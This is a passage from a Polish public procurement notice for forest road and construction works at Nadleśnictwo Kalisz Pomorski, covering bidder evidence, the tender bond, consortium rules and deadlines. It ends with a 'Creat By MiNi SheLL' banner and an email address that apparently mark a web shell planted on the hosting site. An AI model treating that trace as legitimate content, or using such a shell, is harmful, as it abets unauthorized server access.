zawodowych lub sytuacji finansowej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do <br/>realizacji, których te zdolności są wymagane. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, <br/>pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w <br/>postępowaniu, o których mowa w pkt 7.1. ppkt 3) i 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane w pkt 6.1. i 6.3.SWZ względem Wykonawcy. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę <br/>poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. i 6.3. SWZ Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacji z KRK w zakresie:(a) art. 108 ust. 1 pkt 1) i 2)<br/>PZP, (b) art. 108 ust. 1 pkt 4) PZP, dotyczącej orzeczenia zakazu ubiegania się o <br/>zamówienie publiczne tytułem środka karnego – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku <br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 <br/>lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. <br/>poz. 275) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o <br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego <br/>Wykonawcy należącego do tej samej grupy kapitałowej - (załącznik nr 5 do SWZ);<br/>c) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki <br/>organizacyjnej ZUS lub właściwego oddziału regionalnego lub właściwej placówki terenowej KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>e) odpisu lub informacji z KRS lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji;<br/>f) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (załącznik nr 2B do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3) PZP, b) art. 108 ust. 1 pkt 4) PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5) PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6)PZP, e) art. 109 ust. 1 pkt 1) PZP, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r., poz. 1170 z późn. zm.), f) art. 109 ust. 8 i 10 PZP - ( załącznik nr 8 do SWZ).<br/>2. Dodatkowe informacje w rozdziale 9.SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. SWZ Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej <br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność <br/>kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej <br/>złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez <br/>Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 9.2. lit. a) SWZ, Wykonawca składa inne podmiotowe środki dowodowe, które w <br/>wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego <br/>warunku udziału w postępowaniu dotyczącego sytuacji finansowej.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z <br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na <br/>rzecz których roboty te zostały wykonane (wzór wykazu wykonanych robót <br/>budowlanych stanowi załącznik nr 6 do SWZ). Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio <br/>uczestniczył. Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.<br/>c) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności <br/>technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa wyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami <br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień (numer oraz zakres uprawnień zapewniających prawo wykonywania <br/>samodzielnych funkcji technicznych w budownictwie, z podaniem daty i pełnej <br/>podstawy prawnej ich wydania) niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz nformacją <br/>o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych <br/>przez wykonawcę do realizacji zamówienia stanowi załącznik nr 7 do SWZ).<br/>2. Dodatkowe informacje w rozdziale 9.SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wyk. może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach tech. lub zaw. (warunki wskazane w pkt 7.1. ppkt 4) SWZ) lub sytuacji fin. (warunek wskazany w pkt 7.1. ppkt 3) SWZ)<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wyk., który polega na zdolnościach tech. lub zaw. lub syt. fin. podmiotów udost. zasoby, składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udost. zasoby do oddania mu do dyspozycji <br/>niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia lub inny <br/>podmiotowy środek dowodowy potwierdzający, że Wyk. realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udost. zasoby, o którym mowa wyżej, potwierdza, że stosunek łączący Wyk. z podmiotami udost. zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: (1) zakres dostępnych Wyk. zasobów podmiotu udost. zasoby; (2) sposób i okres udostępnienia Wyk. i wykorz. przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; (3) czy i w jakim zakresie podmiot udost. zasoby, na zdolnościach którego Wyk. polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą. <br/>Niewiążący wzór zobowiązania do oddania Wyk. do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 4 do SWZ.<br/>2) oświadczenie podmiotu udost. zasoby, potwierdzające brak podstaw <br/>wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu (w zakresie w jakim Wyk. powołuje się na jego zasoby) sporządzone zgodnie ze <br/>wzorami stanowiącymi załączniki nr 2C i 2D do SWZ. Wyk., który polega na zdolnościach tech. lub zaw.lub syt. fin. na zasadach określonych w art. 118 PZP zobowiązany będzie do przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 9.3. lit. a), c)—f) SWZ, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. Dokumenty, o których mowa w pkt 9.3. lit. a), c)-f) SWZ Wyk. będzie obowiązany złożyć w terminie wskazanym przez <br/>Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym przez Zamawiającego do Wyk. w trybie art. 274 ust. 1 PZP. Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 PZP, mających siedzibę lub miejsce zamieszkania poza terytorium RP, postanowienia zawarte w pkt 9.5.-9.7 SWZ stosuje się odpowiednio.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami RP zamiast:<br/>1) informacji z KRK, o której mowa w pkt 9.3. lit. a) SWZ -składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wyk. ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w pkt 9.3. lit. a) SWZ, <br/>2) zaświadczenia, o którym mowa w pkt 9.3. lit. c) SWZ, zaświadczenia albo innego dokumentu potwierdzającego, że Wyk. nie zalega z opłacaniem składek na ubezpieczenia społ. lub zdr., o których mowa w pkt 9.3 lit. d) SWZ, lub odpisu albo informacji z KRS lub z CEiIoDG o których mowa w pkt 9.3. lit. e) SWZ - składa dokument lub dokumenty wystawione w kraju, w którym Wyk. ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: <br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub <br/>składek na ubezpieczenie społeczne lub zdrowotne, <br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie <br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego <br/>działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej <br/>tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w <br/>przepisach miejsca wszczęcia tej procedury.<br/>3. Dodatkowe informacje w rozdziale 9.SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 4000,00 zł (słownie złotych: cztery tysiące 00/100 PLN). Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2) i 3) oraz ust. 2 PZP. <br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku <br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r., poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony w Banku Ochrony Środowiska S.A., nr rachunku: 49 1540 1030 2001 7702 4918 0001 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu „Roboty budowlane - Nadleśnictwo Kalisz Pomorski”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3) PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14) PZP w zw. z art. 266 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia <br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i <br/>nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie <br/>Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty Wyk. wspólnie ubiegających się o udzielenie zamówienia <br/>(konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wyk.wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich <br/>Wyk. wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść <br/>pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu (o załącznik nr 2A do <br/>SWZ) oraz oświadczenie o braku podstaw do wykluczenia (załącznik nr 2B do SWZ) składa każdy z Wyk. Oświadczenia Wyk. wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. SWZ obowiązany będzie złożyć każdy z Wyk. wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wyk. wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>6) Wyk. wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród <br/>siebie Wyk. kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania <br/>umowy w całości przez lidera lub od wszystkich Wyk. wspólnie <br/>ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8) Na mocy art. 117 ust. 4 PZP, Wyk. będą zobowiązani złożyć wraz z ofertą <br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wyk. - oświadczenie takie należy złożyć w sytuacji gdy, stosownie do postanowień pkt 7.3.SWZ, Wyk. wspólnie ubiegający się o udzielenie <br/>zamówienia będą polegać na zdolnościach (w odniesieniu do warunków <br/>dotyczących kwalifikacji zawodowych lub doświadczenia) tych z Wykonawców, <br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są <br/>wymagane. Wzór stosownego oświadczenia został zawarty w formularzu Oferty stanowiącym załącznik nr 1 SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do wykonawców, prowadzących działalność w formie spółki cywilnej. <br/>2. W przypadku Wykonawców wykonujących dział. w formie sc postanowienia dot. oferty Wyk. wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio, z zastrzeżeniem, że do odpowiedzi na wezwanie Zamaw. do złożenia dok., o którym mowa w pkt 9.3. SWZ należy załączyć (1) zaświadczenia właściwego naczelnika US potw., że Wyk. nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wyst. nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamaw. żąda złożenia dok. potw., że przed upływem terminu składania ofert Wyk. dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności, oraz (2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej ZUS lub właściwego oddziału regionalnego lub właściwej placówki terenowej KRUS potwierdzającego, że Wyk. nie zalega z opłacaniem składek na ubezp. społ. i zdr., w zakresie art. 109 ust. 1 pkt 1) PZP, wyst. nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem .<br/>3. Dodatkowe informacje w rozdziale 9. SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera projekt umowy stanowiący załącznik nr 3 do SWZ.<br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający <br/>przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy przetargowej https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Działająca na podstawie art. 286 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm. - „PZP”), Zamawiający wprowadza zmiany jak niżej do treści SWZ. Zmiany SWZ powodują zmiany ogłoszenia o zamówieniu.<br/><br/>1.1. Usuwa się zapis zawarty w SWZ w dziale 3. w punkcie 3.1. ppkt 3) lit. a) o treści:<br/>„Równanie (profilowanie) dróg leśnych równiarką samojezdną – 37400 m x 3,5 m = 130 900 m2”<br/>1.2. Wprowadza się zapis zawarty w SWZ w dziale 3. w punkcie 3.1. ppkt 3) lit. a) o treści:<br/>„Równanie (profilowanie) dróg leśnych równiarką samojezdną wraz z zagęszczeniem walcem samojezdnym – 37400 m x 3,5 m = 130 900 m2”<br/><br/>2.1. Usuwa się zapis zawarty w SWZ w dziale 3. w punkcie 3.3. o treści:<br/>„Roboty budowlane będą realizowane w dniach od poniedziałku do piątku w godzinach 07:00 – 17:00, w terminie 14 dni od daty podpisania umowy”<br/>2.2. Wprowadza się zapis zawarty w SWZ w dziale 3. w punkcie 3.3. o następującej treści:<br/>„Roboty budowlane będą realizowane w dniach od poniedziałku do piątku w godzinach 07:00 – 17:00, w terminie 21 dni od daty podpisania umowy”

Creat By MiNi SheLL
Email: jattceo@gmail.com